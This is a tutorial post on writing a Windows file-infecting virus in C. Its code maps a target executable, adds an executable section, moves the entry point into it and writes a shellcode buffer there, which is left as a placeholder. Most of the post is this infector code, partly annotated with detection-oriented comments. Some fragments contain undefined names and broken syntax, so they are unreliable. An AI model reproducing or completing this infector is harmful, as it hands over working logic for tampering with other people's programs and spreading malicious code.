
Hacking Windows Virus Writing

sisu

Computer viruses were for a long time the most widespread kind of malware; they can still be used today, but not for the same purpose.

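So how are computer viruses for Windows written?
Our logic is to create a new section to inject our shellcode into, then change the entry point to the start of our code. So simple.
There are other techniques, but this one is the easiest. It is also one of the easiest to spot afterwards: the section table gains an entry and the entry point moves into it, and both can be read straight from the file's headers.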
*We will use C.*
First we read the file into memory using CreateFileMappingA:

Code:
#include <stdio.h>
#include <windows.h>
/*
 * Tutorial fragment: opens the target executable and maps it into memory.
 * main() is not closed in this fragment; the post continues it in the
 * snippets that follow, which edit the PE headers through the mapped view.
 *
 * Defender's view: an existing executable is opened with GENERIC_WRITE and
 * mapped read/write. A process writing to another program's image on disk is
 * the event that file-integrity monitoring and EDR file-write telemetry record.
 */
int main(char *argv[],int argc){
    char* path = {0};// path of the target PE (initialised to null in this fragment)
    // Share mode 0: no other handle can open the file while this one is held.
    HANDLE hFile = CreateFileA(path, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    // Size arguments 0,0: the mapping covers the file at its current size.
    HANDLE hMapping = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, 0, NULL);
    // Read/write view over the file contents.
    BYTE* pMappedFile = (BYTE*)MapViewOfFile(hMapping, FILE_MAP_ALL_ACCESS, 0, 0, 0);
    if (pMappedFile == NULL) {
        printf("Error mapping file");
        CloseHandle(hMapping);
        CloseHandle(hFile);
}

Then, in the second part, we need to create a new section and update the NT header information...
Before we go to the code we need to understand:
The NT header includes a lot of important information about the PE (Portable Executable).
The section header includes information about the sections.

Code:
  // Tutorial fragment: locate the PE headers inside the mapped view and claim
  // one more entry in the section table.
  PIMAGE_DOS_HEADER DosHd = (PIMAGE_DOS_HEADER)pMappedFile;// DOS header at the start of the view
    PIMAGE_NT_HEADERS NtHd = (PIMAGE_NT_HEADERS)(pMappedFile + pDosHeader->e_lfanew);// NT headers, at offset e_lfanew
    PIMAGE_SECTION_HEADER SecNt = IMAGE_FIRST_SECTION(NtHd);// first entry of the section table
    // The slot directly after the last existing section header is used for the new entry.
    PIMAGE_SECTION_HEADER Newsec = &secNt[pNtHeaders->FileHeader.NumberOfSections];
    memset( Newsec , 0, sizeof(IMAGE_SECTION_HEADER));
    
    #define NAMESEC ".infsec"// name of the added section
    #define SECTION_SIZE 0x1000// 0x1000 bytes (4 KB)
     // Defender's view: the name is stored in the section header itself, so an
     // extra table entry with an unfamiliar name shows up in any PE parser.
     strcpy((char*) Newsec ->Name, SECTION_NAME);

Code:
// Tutorial fragment: fill in the new section header.
// Defender's view: the section built here is the last one both in memory
// (placed at the old SizeOfImage, rounded up) and on disk (placed at the old
// end of file, rounded up), and it is flagged as executable code.
    DWORD sectionAlignment = NtHd ->OptionalHeader.SectionAlignment;
    // Old SizeOfImage rounded up to a multiple of SectionAlignment.
    Newsec ->VirtualAddress = ( NtHd ->OptionalHeader.SizeOfImage + sectionAlignment - 1) & ~(sectionAlignment - 1);
    Newsec ->Misc.VirtualSize = SECTION_SIZE;// in-memory size: 4 KB
  
   // On-disk placement of the section.
    DWORD fileAlignment = NtHd ->OptionalHeader.FileAlignment;
    // Seeking 0 bytes from FILE_END returns the current end-of-file offset.
    DWORD rawDataPointer = SetFilePointer(hFile, 0, NULL, FILE_END);
    Newsec ->PointerToRawData = (rawDataPointer + fileAlignment - 1) & ~(fileAlignment - 1);// end of file rounded up to FileAlignment
    Newsec ->SizeOfRawData = (SECTION_SIZE + fileAlignment - 1) & ~(fileAlignment - 1);// SECTION_SIZE rounded up to FileAlignment
    // Flags set: contains code, readable, executable. The write flag is not set.
    Newsec ->Characteristics = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE;

Now we update the entry point:

Code:
 // The entry point is set to the start of the added section. Defender's view:
 // an entry point that lies in the last section of the image, rather than in
 // the original code section, is a long-standing static heuristic for a
 // patched executable.
 NtHd ->OptionalHeader.AddressOfEntryPoint = Newsec ->VirtualAddress;

Updating the NT header again:

Code:
  // Tutorial fragment: make the headers account for the added section.
  // Defender's view: both fields differ from the vendor's original file, so a
  // header comparison against a known-good copy shows the change.
  NtHd->FileHeader.NumberOfSections++ ;// section count grows by one
    NtHd->OptionalHeader.SizeOfImage = Newsec ->VirtualAddress + Newsec ->Misc.VirtualSize;// image now ends after the added section

In the last part we need to copy our shellcode into the file:

Code:
 // Tutorial fragment: move the file pointer to the new section's raw offset.
 SetFilePointer(hFile, Newsec->PointerToRawData, NULL, FILE_BEGIN);
      // Placeholder buffer: two 0xFF bytes, the rest of the array is zero. The
      // text after the semicolon on the next line is the author's note, kept
      // exactly as posted.
      BYTE sec[SECTION_SIZE]= "\xFF\xFF";/here write ur shellcode ur shellcode should jump into the old entry point again   
      DWORD bytesWritten;
      // The whole SECTION_SIZE buffer is written at that offset, so the file
      // on disk grows. Defender's view: size and hash no longer match any
      // previously recorded values for this file.
      WriteFile(hFile, sec, sizeof(sec), &bytesWritten, NULL);

After that we combine all of this code together:

Code:
#include <stdio.h>
#include <windows.h>
#define NAMESEC ".infsec"// name stored in the added section's header; a fixed string like this is a trivial static signature for this sample
#define SECTION_SIZE 0x1000// size of the added section: 0x1000 bytes (4 KB)
// Buffer written into the added section. Only two 0xFF placeholder bytes are
// set; the rest of the array is zero. The post leaves the payload to the
// reader and says it should jump back to the old entry point.
BYTE sec[SECTION_SIZE]= "\xFF\xFF";
/*
 * Combined listing from the post: appends one section to a PE file on disk
 * and points the entry point at it.
 *
 * Neither parameter is read; the target path is a hard-coded literal.
 * Returns 0.
 *
 * What the modified file looks like to a defender, as established by the
 * statements below:
 *   - the section table has one more entry, named NAMESEC, flagged
 *     code / readable / executable;
 *   - AddressOfEntryPoint equals the VirtualAddress of that last section;
 *   - NumberOfSections and SizeOfImage differ from the original file;
 *   - SECTION_SIZE bytes are written at the old end of file (rounded up to
 *     FileAlignment), so file size and file hash change;
 *   - NOTE(review): headers covered by an Authenticode signature are edited,
 *     so a signed target would presumably no longer verify; confirm with a
 *     signature check on a sample.
 */
int main(char *argv[],int argc){
    char* path = "target//pe";
    // Existing file, read/write access, share mode 0 (exclusive while open).
    HANDLE hFile = CreateFileA(path, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    // Size arguments 0,0: the mapping covers the file at its current size.
    HANDLE hMapping = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, 0, NULL);
    // Read/write view; the header edits below go through this pointer.
    BYTE* pMappedFile = (BYTE*)MapViewOfFile(hMapping, FILE_MAP_ALL_ACCESS, 0, 0, 0);
    if (pMappedFile == NULL) {
    printf("Error mapping file");
    CloseHandle(hMapping);
    CloseHandle(hFile);
}
    PIMAGE_DOS_HEADER DosHd = (PIMAGE_DOS_HEADER)pMappedFile;// DOS header at the start of the view
    PIMAGE_NT_HEADERS NtHd = (PIMAGE_NT_HEADERS)(pMappedFile + DosHd->e_lfanew);// NT headers, at offset e_lfanew
    PIMAGE_SECTION_HEADER SecNt = IMAGE_FIRST_SECTION(NtHd);// first entry of the section table
    // The slot directly after the last existing section header is used for the new entry.
    PIMAGE_SECTION_HEADER Newsec = &SecNt[NtHd->FileHeader.NumberOfSections];
    memset( Newsec , 0, sizeof(IMAGE_SECTION_HEADER));
    strcpy((char*) Newsec ->Name, NAMESEC);// section name written into the header
    DWORD sectionAlignment = NtHd ->OptionalHeader.SectionAlignment;
    // Old SizeOfImage rounded up to a multiple of SectionAlignment.
    Newsec ->VirtualAddress = ( NtHd ->OptionalHeader.SizeOfImage + sectionAlignment - 1) & ~(sectionAlignment - 1);
    Newsec ->Misc.VirtualSize = SECTION_SIZE;// in-memory size: 4 KB
    // On-disk placement of the section.
    DWORD fileAlignment = NtHd ->OptionalHeader.FileAlignment;
    // Seeking 0 bytes from FILE_END returns the current end-of-file offset.
    DWORD rawDataPointer = SetFilePointer(hFile, 0, NULL, FILE_END);
    Newsec ->PointerToRawData = (rawDataPointer + fileAlignment - 1) & ~(fileAlignment - 1);// end of file rounded up to FileAlignment
    Newsec ->SizeOfRawData = (SECTION_SIZE + fileAlignment - 1) & ~(fileAlignment - 1);// SECTION_SIZE rounded up to FileAlignment
    // Flags set: contains code, readable, executable. The write flag is not set.
    Newsec ->Characteristics = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE;
    // Entry point now lies in the last section instead of the original code section.
    NtHd ->OptionalHeader.AddressOfEntryPoint = Newsec ->VirtualAddress;
    NtHd->FileHeader.NumberOfSections++ ;// section count grows by one
    NtHd->OptionalHeader.SizeOfImage = Newsec ->VirtualAddress + Newsec ->Misc.VirtualSize;// image now ends after the added section
    // Position the file pointer at the new section's raw offset.
    SetFilePointer(hFile, Newsec->PointerToRawData, NULL, FILE_BEGIN);
    DWORD bytesWritten;
    // Writes the whole SECTION_SIZE buffer at that offset; the file on disk grows.
    WriteFile(hFile, sec, sizeof(sec), &bytesWritten, NULL);
    // Release the view, the mapping object and the file handle.
    UnmapViewOfFile(pMappedFile);
    CloseHandle(hMapping);
    CloseHandle(hFile);
    return 0;
}
 